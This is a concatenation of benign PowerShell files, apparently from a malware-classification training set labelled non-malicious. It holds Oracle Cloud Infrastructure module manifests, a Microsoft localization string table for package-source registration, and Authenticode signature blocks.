# UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz
# aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku
# aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA
# QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2
# VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu
# bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw
# LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93
# d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt
# MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q
# XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6
# U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt
# I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis
# 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp
# kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0
# sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e
# W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ
# sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7
# Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0
# dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ
# tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh
# bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpG
# QzQxLTRCRDQtRDIyMDElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy
# dmljZaIjCgEBMAcGBSsOAwIaAxUAFpuZafp0bnpJdIhfiB1d8pTohm+ggYMwgYCk
# fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF
# AOnRNjcwIhgPMjAyNDA0MjMwMzE3MTFaGA8yMDI0MDQyNDAzMTcxMVowdDA6Bgor
# BgEEAYRZCgQBMSwwKjAKAgUA6dE2NwIBADAHAgEAAgIGTzAHAgEAAgISKDAKAgUA
# 6dKHtwIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID
# B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAJGWfZwVVUXGqknPpN5P
# fd5rVR0469ZaJMbGZzQ1dzaaY9Sax245p1BzmfEruu2bQnn2Lgkxk8vnDVDd5CsZ
# H1aV5VF7esEASmAC3ER/+3iIUF7JY5RDjCj7D0k1GzOk0vSNVwvoBvp7tKr58ONo
# +ap854dEBGs78lzvXhGLmkkmMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt
# U3RhbXAgUENBIDIwMTACEzMAAAHimZmV8dzjIOsAAQAAAeIwDQYJYIZIAWUDBAIB
# BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx
# IgQg/FeP/0iiPidTtyR4chgZysJve+lx9BHWH8PX6NW+QvUwgfoGCyqGSIb3DQEJ
# EAIvMYHqMIHnMIHkMIG9BCAriSpKEP0muMbBUETODoL4d5LU6I/bjucIZkOJCI9/
# /zCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB4pmZ
# lfHc4yDrAAEAAAHiMCIEIOvMT+SyJw7RelwO8FiUTkC3A7JrHvX2337Z7F9KPOo1
# MA0GCSqGSIb3DQEBCwUABIICADUY+WvIMR71PeYf08RscH5w84SSrFNAQhvYb4Y4
# XVE4FYd2vLNfRAkUs3d+iwvQU2KPQxbMhu4qV0u8dJy47UpxMGCyDXiqnGgtkqAL
# JVeSLvy7b0uNnhVruZ+zk6erJ+oiOMnoBhxAGbwtluybcbd3cIjgAVxFTaw31l9H
# H57lzRgKcsfKQ47dJfs7OxC6PotMAgJJkh6K8OUD+TIcRBKPHwA2tIqfSKCaTTxD
# IYBqdjblsqtalM+ryIYJEDACxnm6dG3rkpizIQG8Sqr/TBxdo9+uFBFlJq2xLvwY
# McnHAQ9v3MqyJ/rJdRNJWoyXI2zh5S96wlF9/IGGc/3fmWWWXs7WLjs7tYLxxIa0
# j1QR6Evl/dRnjWAsQZgUcIxyLSqMtrgMMfdKt4nx1Bhib8d5i/6wct6CMXovmhUi
# byUyGLrDgM53466nYxXAX5iEqK8/0RG2JZx2kIswdIrgh7kX37HwtTVd0S/kAFEV
# PCV/TJYOLz/Icb6ewADjWG2m59chMNZPHV1xtENBi1Kv43rjenJBVt0upzcPd28y
# UkDFGQUVH7+etoElOIJ9gX5++sTE9X2jVcdmax0dHGOE/nU0dk6XJiyxkQvMq5Ea
# LIhnJDpAiNhif1qzIcVMmscEI5gqFZunHPvnl5xfqEU+MiG+fF30x4AE8RS2XFw6
# nhyn
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_58_36.ps1
|
sample_58_36.ps1
|
#
# Module manifest for module 'OCI.PSModules.Aidocument'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Aidocument.dll'
# Version number of this module.
ModuleVersion = '84.0.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '48b9296a-b4a7-43bb-8d59-3eaf832baf2a'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Aidocument Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '84.0.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Aidocument.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCIAidocumentModel', 'Get-OCIAidocumentModelsList',
'Get-OCIAidocumentProcessorJob', 'Get-OCIAidocumentProject',
'Get-OCIAidocumentProjectsList', 'Get-OCIAidocumentWorkRequest',
'Get-OCIAidocumentWorkRequestErrorsList',
'Get-OCIAidocumentWorkRequestLogsList',
'Get-OCIAidocumentWorkRequestsList',
'Invoke-OCIAidocumentAnalyzeDocument',
'Invoke-OCIAidocumentPatchModel',
'Move-OCIAidocumentModelCompartment',
'Move-OCIAidocumentProjectCompartment', 'New-OCIAidocumentModel',
'New-OCIAidocumentProcessorJob', 'New-OCIAidocumentProject',
'Remove-OCIAidocumentModel', 'Remove-OCIAidocumentProject',
'Stop-OCIAidocumentProcessorJob', 'Stop-OCIAidocumentWorkRequest',
'Update-OCIAidocumentModel', 'Update-OCIAidocumentProject'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Aidocument'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_58_17.ps1
|
sample_58_17.ps1
|
#
# Module manifest for module 'OCI.PSModules.Opa'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Opa.dll'
# Version number of this module.
ModuleVersion = '85.2.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = 'b3b17045-1e55-4c1b-8e02-641f25d4bb58'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Opa Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '85.2.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Opa.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCIOpaInstance', 'Get-OCIOpaInstancesList',
'Get-OCIOpaWorkRequest', 'Get-OCIOpaWorkRequestErrorsList',
'Get-OCIOpaWorkRequestLogsList', 'Get-OCIOpaWorkRequestsList',
'Move-OCIOpaInstanceCompartment', 'New-OCIOpaInstance',
'Remove-OCIOpaInstance', 'Start-OCIOpaInstance',
'Stop-OCIOpaInstance', 'Stop-OCIOpaWorkRequest',
'Update-OCIOpaInstance'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Opa'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_59_37.ps1
|
sample_59_37.ps1
|
#
# Copyright (c) Microsoft Corporation.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
ConvertFrom-StringData @'
###PSLOC
StartGetPackageSource=Begin invoking Get-packageSource {0}
StartRegisterPackageSource=Begin invoking Register-Packagesource {0}
StartUnRegisterPackageSource=Begin invoking UnRegister-Packagesource {0}
PackageSourceFound=Package source '{0}' found
PackageSourceNotFound=Package source '{0}' not found
RegisteredSuccess=Successfully registered the package source {0}
UnRegisteredSuccess=Successfully unregistered the package source {0}
RegisterFailed=Failed to register the package source {0}. Message:{1}
UnRegisterFailed=Failed to register the package source {0}. Message:{1}
InDesiredState=Resource {0} is in the desired state. Required Ensure is {1} and actual Ensure is {2}
NotInDesiredState=Resource {0} is not in the desired state. Required Ensure is {1} and actual Ensure is {2}
NotInDesiredStateDuetoLocationMismatch=Resource {0} is not in the desired state. Required location is {1} and registered is {2}
NotInDesiredStateDuetoPolicyMismatch=Resource {0} is not in the desired state. Required installation policy is {1} and registered is {2}
InstallationPolicyWarning=Begin registering '{0}' to source location '{1}' with '{2}' policy"
###PSLOC
'@
# SIG # Begin signature block
# MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDFuym1v/NtoXxJ
# gjHj6HUj0SEsN/GPakQw8oc6hd5e16CCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIATZA7LJPyCoN3GjbGxrPSVp
# T74sycop1NpRf9jCRv8CMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAZIi0sox2XVUUp4hiLY/mmnxFTT9MFsMC9nzG6pROu4HW4uxbEf71KCSg
# PRV7l3AbwMGaeP/VsG8Qswq2SVfUTt7/1bqhBay7Ic6cnPgGeaP1bTQD2A558Nrm
# 7UMlqx9LA+KidehgAS26gV5mxwXs4f+Yn15wzr8HBIZF9ptnSqsdoShpiPYezyGe
# UhxvBa8O9G9JJ4dwviKza+v2q92V3+XcJYz9HpnlHDVrIz+yFeANElrcy+cxlTBd
# BphA7PFIN0XiscbuyMi4haRQHau2YJ35pdmXUkMFqIRoRxs6V3moh2hwzDSgxxQ6
# r6e1lj5Oz8NNixsYRF2YdCjyQcCRY6GCFykwghclBgorBgEEAYI3AwMBMYIXFTCC
# FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq
# hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCD6OzrgUPVT6KEPTNJ457Q+67nVfV74NQwELOqlDNYg4gIGZk3kXaEC
# GBMyMDI0MDUyMzE2NDM1OC4yMTJaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO
# OjNCRDQtNEI4MC02OUMzMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT
# ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHlj2rA8z20C6MAAQAAAeUwDQYJ
